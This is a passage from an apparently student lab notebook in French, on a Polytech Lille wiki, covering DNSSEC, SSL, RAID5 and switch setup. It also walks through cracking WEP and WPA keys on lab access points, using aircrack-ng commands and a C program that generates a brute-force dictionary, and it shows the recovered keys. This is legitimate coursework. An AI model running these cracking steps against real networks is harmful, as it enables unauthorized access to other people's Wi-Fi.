A partir de ce moment là, notre serveur DNS est opérationnel. Il nous faut maintenant le sécuriser grâce à DNSSEC.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il nous faut générer les clefs asymétriques KSK et ZSK. Nous entrons alors les commandes suivantes dans le terminal :&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -f KSK -b 2048 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef KSK&lt;br /&gt;
 dnssec-keygen -a RSASHA1 --b 1024 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef ZSK&lt;br /&gt;
&lt;br /&gt;
Nous avons maintenant 4 clefs : deux pour chaque type de clef (KSK ou ZSK) avec deux extention différentes (.key pour la clef publique, .private pour la privée).&lt;br /&gt;
&lt;br /&gt;
Après les avoir placé dans le répertoire ''bielloumutherfucker.space.dnssec'' que nous avons crée, on les renomme selon le schéma suivant :&lt;br /&gt;
&lt;br /&gt;
 bielloumutherfucker.space-ksk.key et bielloumutherfucker.space-ksk.private&lt;br /&gt;
 bielloumutherfucker.space-zsk.key et bielloumutherfucker.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant signer la zone à l'aide de la commande suivante (depuis le dossier /etc/bind) :&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o bielloumutherfucker.space -k bielloumutherfucker.space-ksk &lt;br /&gt;
 zones/db.bielloumutherfucker.space bielloumutherfucker.space-zsk&lt;br /&gt;
&lt;br /&gt;
Une nouvelle zone, signée, a donc été créée dans notre dossier ''zones''. Il ne nous reste plus qu'à modifier le fichier ''named.conf.local'' en rajoutant un ''.signed'' à la fin du champ File pour notre zone. Nous redémarrons ensuite le serveur bind.&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Nous retournons sur le site de gandi et dans la rubrique ''gérer DNSSEC'' nous ajoutons notre clef publique avec l'algorithme ''RSASHA1''. Une fois la clef ajoutée sur gandi, on peut voir que tous s'est bien passé en faisant un tour sur le site ''Zone Master'', l'attribut DNSSEC est en effet coché et vert.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du site via certificat SSL===&lt;br /&gt;
&lt;br /&gt;
Il faut dans un premier temps générer la clefs CSR que nous donnerons à Gandi.&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout Ironman.key -out Ironman.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 ..................................................................+++&lt;br /&gt;
 .........................................+++&lt;br /&gt;
 writing new private key to 'Ironman.key'&lt;br /&gt;
 -----&lt;br /&gt;
 You are about to be asked to enter information that will be incorporated&lt;br /&gt;
 into your certificate request.&lt;br /&gt;
 What you are about to enter is what is called a Distinguished Name or a DN.&lt;br /&gt;
 There are quite a few fields but you can leave some blank&lt;br /&gt;
 For some fields there will be a default value,&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord &lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:bielloumutherfucker.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 Please enter the following 'extra' attributes&lt;br /&gt;
 to be sent with your certificate request&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, ls clefs ont été générées : &lt;br /&gt;
 &lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
 Ironman.csr  Ironman.key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Et nous pouvons donner la CSR à Gandhi afin d'activer la procédure d'activation.&lt;br /&gt;
&lt;br /&gt;
De façon à recevoir le mail sur admin@bielloumutherfucker.space, nous devons modifier le fichier /etc/aliases et y rajouter la ligne suivante:&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat validé, il faut déplacer les clefs dans les dossiers suivants :&lt;br /&gt;
&lt;br /&gt;
 cp Ironman.key /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
 cp certificate-380187.crt /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
 cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem (clef intermédiaire)&lt;br /&gt;
&lt;br /&gt;
On effectue ensuite un rehash des certificats :&lt;br /&gt;
&lt;br /&gt;
 c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 6860aa7d.0&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 5692355e.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; a036afff.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; 4390636f.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; 8544bf03.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; e279a80b.0&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le fichier ''000-bielloumutherfucker.space-ssl.conf'' dans le dossier /etc/apache2/sites-available :&lt;br /&gt;
&lt;br /&gt;
 #NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.167:443&amp;gt;&lt;br /&gt;
                ServerName www.bielloumutherfucker.space&lt;br /&gt;
                ServerAlias bielloumutherfucker.space&lt;br /&gt;
                DocumentRoot /var/www/html/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/html&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
 ServerName &amp;quot;bielloumutherfucker.space&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Puis on modifie le fichier /etc/apache/ports.conf afin qu'apache écoute sur le port 443 (ssl) :&lt;br /&gt;
&lt;br /&gt;
 Listen 80 443&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On doit ensuite autoriser apache à utiliser son module ssl : &lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Puis on autorise notre site à utiliser ssl :&lt;br /&gt;
&lt;br /&gt;
 a2ensite 000-bielloumutherfucker.space-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Ensuite :&lt;br /&gt;
&lt;br /&gt;
 service apache2 restart&lt;br /&gt;
 service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Maintenant, lorsqu'on se connecte sur notre site avec le préfixe &amp;quot;https://&amp;quot;, le site s'ouvre bien, et on aperçoit un cadenas vert certifiant que le site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ssl.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation des données===&lt;br /&gt;
&lt;br /&gt;
Nous commençons dans un premier temps à créer trois partitions via les commandes suivantes :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/ironman-1 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/ironman-2 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/ironman-3 -v&lt;br /&gt;
&lt;br /&gt;
Puis nous modifions notre fichier de configuration de machine virtuelle Ironman.cfg en y ajoutant les trois lignes suivantes dans la partie '''disk''':&lt;br /&gt;
&lt;br /&gt;
 'phy:/dev/virtual/ironman-1,xvdd,w',&lt;br /&gt;
 'phy:/dev/virtual/ironman-2,xvde,w',&lt;br /&gt;
 'phy:/dev/cirtual/ironman-3,xvdf,w',&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, on relance notre machine virtuelle, puis on y installe le paquet mdadm.&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite le volume /dev/md0:&lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf &lt;br /&gt;
&lt;br /&gt;
On affiche ensuite la configuration actuelle de /dev/md0:&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : Ironman:0  (local to host Ironman)&lt;br /&gt;
           UUID : a82c02d3:4861fdcc:aa9f6f91:45e6f5d9&lt;br /&gt;
         Events : 0&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
On sauvegarde ensuite la configuration de md0 :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier /datamd0 que nous montons sur notre device md0 :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mkfs /dev/md0&lt;br /&gt;
 root@Ironman:~# mkdir /datamd0&lt;br /&gt;
 root@Ironman:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ensuite créer un fichier de test sur le raid 5 (iron-man.txt):&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/datamd0# ls&lt;br /&gt;
 lost+found  test_ironman.txt&lt;br /&gt;
&lt;br /&gt;
On ferme ensuite notre machine, puis nous modifions son fichier .cfg afin qu'elle ne prenne plus en compte la partition xvdd (on commente la ligne). &lt;br /&gt;
Nous relançons ensuite la machine virtuelle, puis nous réaffichons la configuration de md0 :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Thu Dec  8 17:05:13 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : Ironman:0  (local to host Ironman)&lt;br /&gt;
           UUID : a82c02d3:4861fdcc:aa9f6f91:45e6f5d9&lt;br /&gt;
         Events : 6&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On constate bien que la partion xvdd a été enlevée. Et que le fichier de test sur le raid est toujours présent :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# ls /datamd0/&lt;br /&gt;
 lost+found  test_ironman.txt&lt;br /&gt;
&lt;br /&gt;
On enlève la partition xvdf :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
 [  196.176623] md/raid:md0: Disk failure on xvdf, disabling device.&lt;br /&gt;
 [  196.176623] md/raid:md0: Operation continuing on 1 devices.&lt;br /&gt;
 mdadm: set /dev/xvdf faulty in /dev/md0&lt;br /&gt;
 root@Ironman:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
 [  229.573919] md: unbind&amp;lt;xvdf&amp;gt;&lt;br /&gt;
 [  229.573933] md: export_rdev(xvdf)&lt;br /&gt;
 mdadm: hot removed /dev/xvdf from /dev/md0&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;br /&gt;
&lt;br /&gt;
===Craquage de clé WPA===&lt;br /&gt;
&lt;br /&gt;
Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define MAX_NUM 99999999&lt;br /&gt;
&lt;br /&gt;
 int main(){&lt;br /&gt;
 long chiffre = 0;&lt;br /&gt;
 FILE* fp = NULL;&lt;br /&gt;
 fp = fopen(&amp;quot;dictionnaire.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;
 	if (fp != NULL){&lt;br /&gt;
 		for (chiffre=0;chiffre&amp;lt; MAX_NUM + 1;chiffre++)&lt;br /&gt;
 		{&lt;br /&gt;
 		fprintf(fp,&amp;quot;%08li\n&amp;quot;,chiffre);&lt;br /&gt;
 		}&lt;br /&gt;
 	fclose(fp);&lt;br /&gt;
 	}&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA : &lt;br /&gt;
&lt;br /&gt;
1. On bascule l'interface wifi en mode monitor :&lt;br /&gt;
 airmon-ng start wlan2&lt;br /&gt;
&lt;br /&gt;
2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA :&lt;br /&gt;
 airodump-ng --encrypt WPA wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 00:19:07:C5:0F:A4  -44        7        8    2   1  54e. WPA2 CCMP   MGT  PolytechLille                                              &lt;br /&gt;
 00:19:07:C5:0F:A2  -48        5        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A5  -48        6        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A3  -50        7        0    0   1  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 00:19:07:C5:0F:A1  -50        7        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A7  -52        6        0    0   1  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 00:19:07:C5:0F:A6  -52        5        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A0  -54        6        2    0   1  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 00:19:07:C5:0F:A8  -55        5        5    0   1  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:9C:50:53  -62        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte04                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte03                                                 &lt;br /&gt;
 04:DA:D2:9C:50:58  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte09                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -66        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte01                                                 &lt;br /&gt;
 04:DA:D2:9C:50:55  -65        6        0    0  13  54e. WPA2 CCMP   PSK  cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -65        3        0    0  13  54e. WPA2 CCMP   PSK  cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:59  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte10                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:57  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:51  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte02                                                 &lt;br /&gt;
 04:DA:D2:CF:01:91  -69        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 C8:00:84:84:00:53  -70        3        0    0   9  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 C8:00:84:84:00:52  -71        4        0    0   9  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:98  -70        2        0    0   5  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:CF:01:90  -71        3        0    0   5  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 04:DA:D2:CF:01:95  -72        2        0    0   5  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:97  -72        2        0    0   5  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 04:DA:D2:CF:01:96  -72        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. Nous décidons de cracker cracotte09, on lance un airodump sur son essid et on effectue une capture &lt;br /&gt;
 &lt;br /&gt;
 airodump-ng -w cracotte09 --encrypt wpa -c 13 -essid cracotte09 wlan05&lt;br /&gt;
&lt;br /&gt;
4. On lance le aircrack avec le fichier de capture et notre dictionnaire généré précédemment :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w dictionnaire.txt cracotte09-01.cap&lt;br /&gt;
&lt;br /&gt;
5. Au bout de 57:55 minutes, nous avons obtenu la clé suivante :&lt;br /&gt;
&lt;br /&gt;
passphrase : 12399909&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35773</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35773"/>
				<updated>2016-12-08T14:41:02Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Sécurisation des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
